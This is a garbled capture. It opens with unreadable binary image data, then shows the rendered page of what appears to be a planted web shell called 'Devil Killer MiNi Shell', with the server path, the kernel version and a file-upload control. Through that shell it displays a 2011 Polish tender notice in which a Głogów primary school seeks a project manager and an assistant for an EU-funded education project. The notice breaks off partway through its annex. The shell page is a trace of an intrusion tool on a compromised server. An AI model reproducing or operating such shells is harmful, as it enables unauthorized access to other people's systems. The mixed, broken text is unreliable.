JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110104/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110104/2433-N-2011.html

<p class="kh_header"><b>Głogów: Pełnienie funkcji kierownika i asystenta projektu w ramach projektu Głogowska Akademia Marzeń - wyrównywanie szans edukacyjnych w szkołach podstawowych w Głogowie - etap I</b><br>
<b>Numer ogłoszenia: 2433 - 2011; data zamieszczenia: 04.01.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szkoła Podstawowa Nr 12 z Oddziałami Integracyjnymi im. Kawalerów Orderu Uśmiechu , ul.  Gomółki 43, 67-200 Głogów, woj. dolnośląskie, tel. 076 72 65 610, faks 076 72 65 610.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sp12.master.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka samorządu terytorialnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji kierownika i asystenta projektu w ramach projektu Głogowska Akademia Marzeń - wyrównywanie szans edukacyjnych w szkołach podstawowych w Głogowie - etap I.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część I - Pełnienie funkcji kierownika projektu w SP Nr 12
     Część II -Pełnienie funkcji asystenta kierownika projektu w SP Nr 12
     Część III - Pełnienie funkcji kierownika projektu w SP Nr 10
     Część IV - Pełnienie funkcji asystenta kierownika projektu w SP Nr 10
     Część V - Pełnienie funkcji kierownika projektu w SP Nr 6
     Część VI - Pełnienie funkcji asystenta kierownika projektu w SP Nr 6
2.	Opis przedmiotu zamówienia.
      Część I, III , V - Pełnienie funkcji kierownika projektu
      Obowiązki kierownika projektu
Do zadań kierownika projektu w każdej z powyższych placówek oświatowych należy:
1) Zarządzanie i realizacja projektu zgodnie  z umową o dofinansowanie, harmonogramem i    
     budżetem   projektu; 
2) Nadzór nad realizacją projektu i zgodnością przygotowanych dokumentów z wytycznymi 
    dotyczącymi realizacji projektu w ramach POKL 2007- 2013 i obowiązującymi przepisami oraz politykami Unii Europejskiej;
3) Przygotowanie wzorów dokumentów dotyczących realizacji projektu - wypracowanie    
    wspólnych standardów/ wzorów z kierownikami projektu w pozostałych placówkach   
    oświatowych objętych projektem w oparciu o wytyczne POKL i inne;
4) Koordynowanie działań między nauczycielami prowadzącymi zajęcia a uczniami;
5) Komunikacja, tworzenie i przekazywanie Dyrektorowi szkoły i koordynatorowi projektu   
    raportów z działań;
6) Przetwarzanie danych osobowych uczestników projektu zgodnie z ustawą z dnia 
      29 sierpnia 1997 r. o ochronie danych osobowych (Dz. U. Z 2002 r. Nr 101, poz. 926
      z późn. zm.) i nadzór nad PEFS;
7)  Realizacja prac w zakresie monitorowania i ewaluacji w projekcie;
8)  Komunikacja, tworzenie i przekazywanie Dyrektorowi szkoły i koordynatorowi projektu   
     w Urzędzie Miejskim w Głogowie raportów z działań, w tym zgłaszanie wszelkich  
     zagrożeń na każdym etapie realizacji;
9) Nadzór i koordynacja pracy personelu projektu i wykonawców zewnętrznych;
10) Nadzór nad stroną finansową projektu w części dotyczącej szkoły i jej kompetencji;
11) Prowadzenie dokumentacji projektu;
12)Wdrażanie uzasadnionych zmian do projektu w oparciu o obowiązujące zapisy zawarte 
    w dokumentacji , umowie o dofinansowanie projektu, dokumentach programowych POKL 
      po uprzednim zgłoszeniu do Dyrektora szkoły i koordynatora projektu w Urzędzie   
      Miejskim  w Głogowie oraz akceptacji Instytucji Pośredniczącej, w tym przygotowanie   
      formularza zmian do projektu;
13) Przygotowanie projektów umów z wykonawcami;
14) Nadzór nad promocją projektu;
15) Bieżący kontakt z Instytucją Pośredniczącą i innymi organizacjami lub instytucjami 
      zaangażowanymi bezpośrednio lub pośrednio przy realizacji projektu, w tym przygotowa-
      nie korespondencji Beneficjentowi uprzednio zatwierdzonej przez Dyrektora szkoły i koor-  
      dynatora w Urzędzie Miejskim w Głogowie;
16)Prowadzenie spotkań zespołu kierowniczego;
17)Opracowanie propozycji zakresów czynności dla członków zespołów projektowych w   
      szkole i wykonawców (zgodnie z projektem/ umową o dofinansowanie i wytycznymi   
      POKL));
18) Zakupy i zamówienia publiczne oraz przygotowanie informacji do wniosku o płatności 
       w części dotyczącej szkoły w terminach przewidzianych umową o dofinansowanie;
19)Opracowanie propozycji bieżących materiałów informacyjnych na stronę internetową pro
      jektu;
20)Opracowanie strategii rekrutacji i regulaminu uczestnictwa uczniów w projekcie oraz   
      udział w rekrutacji;
21)Rozliczanie czasu pracy nauczycieli realizujących zajęcia i prowadzonej przez nich doku  
     mentacji;
22)Uczestnictwo w wizytacjach zajęć prowadzonych w ramach projektu;
23)Nadzorowanie prac związanych z umieszczaniem elementów informacyjno-promocyjnych 
     w miejscach realizacji projektu (np. biuro, sale dydaktyczne, budynek);
  24)Sporządzenie wniosków o płatność - część merytoryczna;
  25)Przygotowanie dokumentacji potwierdzającej realizację zajęć (np. listy obecności);
  26)Nadzór nad przechowywaniem i archiwizowaniem dokumentacji projektowej;
  27)Sporządzenie raportu po każdym półroczu realizacji projektu;
  28)Wykonywanie innych zadań wynikających z potrzeby prawidłowego zrealizowania 
       projektu i umowy o dofinansowanie projektu  w tym na żądanie Dyrektora szkoły i koor-   
      dynatora projektu w Urzędzie Miejskim w Głogowie;
  29)Uczestniczenie we wszelkich kontrolach projektu w trakcie jego realizacji ( w tym przygo- 
       towanie wyjaśnień pokontrolnych) oraz przygotowywanie ewentualnych uzupełnień po
       kontrolnych również po zakończeniu realizacji projektu ( w okresie jego trwałości).


Część II, IV , VI - Pełnienie funkcji asystenta kierownika projektu
Obowiązki asystenta kierownika projektu
Do zadań asystenta kierownika projektu w każdej z powyższych placówek oświatowych 
należy:
1) Przygotowanie postępowań i umów do 14 000 euro;
2) Czuwanie nad systematycznością prowadzonych zajęć;
3) Zadania zlecone przez kierownika projektu na potrzeby projektu;
4) Odpowiedzialność za promocję projektu;
5) Przygotowanie i umieszczanie informacji o postępach realizacji projektu na stronie 
     internetowej;
6) Nadzór nad pakietami edukacyjnymi i szkoleniowymi;
7) Koordynowanie działań między nauczycielami prowadzącymi zajęcia a uczniami, w tym  
    przygotowanie i czuwanie nad planem zajęć (opracowanie harmonogramu zajęć dydakty-    
    czno-wychowawczych), organizacja systemu zastępstw, wstępna weryfikacja kart pracy;
8) Archiwizacja dokumentacji projektowej w zakresie szkoły;
9) Udział w spotkaniach zespołu projektowego;
10) Monitorowanie rezultatów i produktów;
11) Opracowanie materiałów informacyjno - promocyjnych projektu i przeprowadzenie  
       promocji zgodnie z umową o dofinansowanie i wytycznymi POKL;
12) Prowadzenie szkolnej tablicy informacyjnej projektu;
13) Pomoc w opracowaniu regulaminu uczestnictwa uczniów w projekcie;
14) Przygotowanie dokumentów rekrutacyjnych zgodnie ze strategią rekrutacji;
15) Przeprowadzenie rekrutacji do projektu zgodnie z polityką równości szans;
16) Przygotowanie list zakwalifikowanych uczestników projektu;
17) Przygotowanie list rezerwowych;
18) Przeprowadzenie rekrutacji uzupełniającej;
19) Dokumentacja fotograficzna projektu;
20) Akceptacja i nadzór nad opracowaniem przez nauczycieli prowadzących programami do  
      zajęć i materiałami dydaktycznymi;
21) Zastępowanie kierownika projektu podczas jego nieobecności spowodowanej chorobą, 
      wypadkiem oraz  innymi zdarzeniami losowymi;
22) Pomoc w przygotowaniu raportów po każdym półroczu realizacji projektu i raportu koń-
      cowego;
23) Uczestniczenie w kontrolach projektu w trakcie jego realizacji ( w tym przygotowywanie 
      wyjaśnień pokontrolnych) oraz  sporządzanie ewentualnych uzupełnień pokontrolnych 
       również po zakończeniu realizacji projektu;
24) Przetwarzanie danych osobowych uczestników projektu zgodnie z ustawą z dnia 29 
      sierpnia 1997 r. o ochronie danych osobowych (Dz. U. Z 2002 r. Nr 101, poz. 926 z późn. 
      zm.) oraz prowadzenie PEFS;
25) Inne na żądanie Dyrektora szkoły i kierownika projektu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o udzielenie zamówienia mogą ubiegać się wykonawcy, którzy udokumentują:2.	posiadania wiedzy i doświadczenia i w tym względzie:
-	Części I, III, V - Zamawiający uzna powyższy warunek za spełniony w stosunku do Wykonawcy, który posiada wykształcenie wyższe magisterskie z przygotowaniem pe-dagogicznym, posiada minimum stopień nauczyciela mianowanego i co najmniej 
5-letni staż pracy w szkole podstawowej oraz wykaże, że ukończył co najmniej jedno szkolenie lub co najmniej jeden kurs w zakresie narzędzi pomiaru dydaktycznego
 i dokonywania ewaluacji,  ukończył co najmniej jeden kurs lub co najmniej jedno szkolenie z zakresu sporządzania wniosków, rozliczania i realizacji projektów współ-finansowanych ze środków Unii Europejskiej.

-	Część II, IV, VI - Zamawiający uzna powyższy warunek za spełniony w stosunku do Wykonawcy, który posiada wykształcenie minimum średnie i przynajmniej 3-letni staż pracy w szkole podstawowej, oraz wykaże, że ukończył co najmniej jeden kurs lub co najmniej jedno szkolenie z zakresu sporządzania wniosków, rozliczania i reali-zacji projektów współfinansowanych ze środków Unii Europejskiej.
Ocena spełnienia warunku będzie dokonana na podstawie złożonych dokumentów potwierdzających spełnianie warunku na zasadzie spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku w tym  zakresie. Do potwierdzenia oświadczenie o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:5.	a) dla części I, III,  V posiada:
     - wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym,
-	 minimum 5- letnie doświadczenie na stanowisku nauczyciela w szkole podstawowej,
-	 posiada doświadczenie w zakresie realizacji programów edukacyjnych w zakresie szko-ły podstawowej,
-	doświadczenie w pracy w zespołach diagnozujących i ewaluacyjnych,
-	wiedzę z zakresu POKL,
-	znajomość prawa oświatowego,
-	znajomość narzędzi ewaluacji, monitoringu i promocji projektu,
-znajomość pakietu MS Office, internetu, generatora wniosków aplikacyjnych POKL 
  i generatora wniosków o płatność oraz programu Excell

b) dla części II, IV,  VI  posiada:
- wykształcenie minimum średnie,
- minimum 3- letni staż pracy w szkole podstawowej,
- znajomość prawa oświatowego,
- wiedzę z zakresu POKL,
- znajomość pakietu MS Office, internetu, oraz programu Excell,
- znajomość narzędzi ewaluacji, monitoringu i promocji projektu.
Do potwierdzenia oświadczenie o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku w tym  zakresie. Do potwierdzenia oświadczenie o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>dokument z którego będzie wynikać uprawnienie do podpisania oferty</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Umowa zostanie zawarta według wzoru stanowiącego załącznik do specyfikacji istotnych warunków zamówienia. Wzór umowy zawiera zapisy dotyczące zakresu obowiązków zarówno kierownika projektu jak i asystenta kierownika. Umowa będzie zawierać tylko zapisy dotyczące wykonywania funkcji. 
2.	Umowa zostanie zawarta na podstawie złożonej oferty Wykonawcy.
3.	W umowie Wykonawca zobowiąże się do naprawienia powstałej szkody w całości i po-kryje koszty w razie nienależytego wykonania zamówienia, zgodnie z przepisami Kodek-su Cywilnego.
4.	Umowę zawiera wybrany Wykonawca lub osoba posiadająca jego pełnomocnictwo do wszelkich czynności związanych z zawieraniem umowy.
5.	Zmiany umowy:
1)	Zmiana postanowień zawartej umowy może nastąpić za zgodą obu Stron wyrażoną na piśmie pod rygorem nieważności.
2)	Niedopuszczalna jest zmiana postanowień zawartej umowy oraz wprowadzanie do umowy postanowień niekorzystnych dla Zamawiającego.
3)	Zamawiający przewiduje możliwość wprowadzenia zmian do zawartej umowy 
w formie pisemnego aneksu na następujących warunkach :
a)	Wykonawca może dokonywać zmiany kluczowych osób, przedstawionych 
w ofercie, jedynie za uprzednią pisemną zgodą Zamawiającego, 
b)	Pozostałe zmiany 
.	jeśli zmiana stawki podatku VAT będzie  powodować  zwiększenie  kosztów  wykonania  po stronie  wykonawcy, Zamawiający  dopuszcza  możliwość zwiększenia  wynagrodzenia  o kwotę równą różnicy  w kwocie  podatku  VAT  zapłaconego  przez  wykonawcę, 
.	jeśli  zmiana  stawki VAT  będzie powodować zmniejszenie  kosztów wyko-nania  umowy  po  stronie wykonawcy, Zamawiający  przewiduje  możliwość  zmniejszenia  wynagrodzenia o kwotę stanowiącą różnicę  kwoty podatku  VAT  do zapłacenia  przez  wykonawcę,
.	 rezygnacja  przez  zamawiającego z realizacji części   przedmiotu  umowy - w takim przypadku  wynagrodzenie  przysługuje  wykonawcy  zostanie  po-mniejszone, przy  czym  Zamawiający  zapłaci za  wszystkie  spełnione  świadczenia  oraz udokumentowane  koszty,  które  wykonawca  poniósł w związku z wynikającymi z umowy  planowaniami  świadczeniami,
.	 zmiany  uzasadnione  okolicznościami, o których  mowa w art. 357 Kc z uwzględnieniem  faktu, że  za rażącą  zostanie uznana strata w wysokości, o  której mowa w art. 397 Ksh.
.	Termin rozpoczęcia realizacji przedmiotu umowy może ulec zmianie na skutek przedłużającej się procedury przetargowej.
c)	Zmiana umowy nastąpić może z inicjatywy Zamawiającego albo Wykonawcy po-przez przedstawienie drugiej stronie propozycji zmian w formie pisemnej, które powinny zawierać: 
.	opis zmiany,
.	uzasadnienie zmiany,
.	koszt zmiany oraz jego wpływ na wysokość wynagrodzenia,
.	czas wykonania zmiany oraz wpływ zmiany na termin zakończenia umowy.
d)	Warunkiem wprowadzenia zmian do zawartej umowy będzie potwierdzenie powsta-łych okoliczności w formie opisowej i właściwie umotywowanej (protokół wraz z uzasadnieniem) przez powołaną przez Zamawiającego komisję</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sp12.master.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szkoła Podstawowa Nr 12 z Oddziałami Integracyjnymi w Głogowie
ul. Gomółki 43
67-200 Głogów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.01.2011 godzina 10:00, miejsce: Szkoła Podstawowa Nr 12 z Oddziałami Integracyjnymi w Głogowie
ul. Gomółki 43
67-200 Głogów
sekretariat szkoły.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Priorytet IX Rozwój wykształcenia i kompetencji w regionach.
Działanie 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty.
Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pełnienie funkcji kierownika projektu w SP Nr 12.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Obowiązki kierownika projektu
Do zadań kierownika projektu w każdej z powyższych placówek oświatowych należy:
1) Zarządzanie i realizacja projektu zgodnie  z umową o dofinansowanie, harmonogramem i    
     budżetem   projektu; 
2) Nadzór nad realizacją projektu i zgodnością przygotowanych dokumentów z wytycznymi 
    dotyczącymi realizacji projektu w ramach POKL 2007- 2013 i obowiązującymi przepisami oraz politykami Unii Europejskiej;
3) Przygotowanie wzorów dokumentów dotyczących realizacji projektu - wypracowanie    
    wspólnych standardów/ wzorów z kierownikami projektu w pozostałych placówkach   
    oświatowych objętych projektem w oparciu o wytyczne POKL i inne;
4) Koordynowanie działań między nauczycielami prowadzącymi zajęcia a uczniami;
5) Komunikacja, tworzenie i przekazywanie Dyrektorowi szkoły i koordynatorowi projektu   
    raportów z działań;
6) Przetwarzanie danych osobowych uczestników projektu zgodnie z ustawą z dnia 
      29 sierpnia 1997 r. o ochronie danych osobowych (Dz. U. Z 2002 r. Nr 101, poz. 926
      z późn. zm.) i nadzór nad PEFS;
7)  Realizacja prac w zakresie monitorowania i ewaluacji w projekcie;
8)  Komunikacja, tworzenie i przekazywanie Dyrektorowi szkoły i koordynatorowi projektu   
     w Urzędzie Miejskim w Głogowie raportów z działań, w tym zgłaszanie wszelkich  
     zagrożeń na każdym etapie realizacji;
9) Nadzór i koordynacja pracy personelu projektu i wykonawców zewnętrznych;
10) Nadzór nad stroną finansową projektu w części dotyczącej szkoły i jej kompetencji;
11) Prowadzenie dokumentacji projektu;
12)Wdrażanie uzasadnionych zmian do projektu w oparciu o obowiązujące zapisy zawarte 
    w dokumentacji , umowie o dofinansowanie projektu, dokumentach programowych POKL 
      po uprzednim zgłoszeniu do Dyrektora szkoły i koordynatora projektu w Urzędzie   
      Miejskim  w Głogowie oraz akceptacji Instytucji Pośredniczącej, w tym przygotowanie   
      formularza zmian do projektu;
13) Przygotowanie projektów umów z wykonawcami;
14) Nadzór nad promocją projektu;
15) Bieżący kontakt z Instytucją Pośredniczącą i innymi organizacjami lub instytucjami 
      zaangażowanymi bezpośrednio lub pośrednio przy realizacji projektu, w tym przygotowa-
      nie korespondencji Beneficjentowi uprzednio zatwierdzonej przez Dyrektora szkoły i koor-  
      dynatora w Urzędzie Miejskim w Głogowie;
16)Prowadzenie spotkań zespołu kierowniczego;
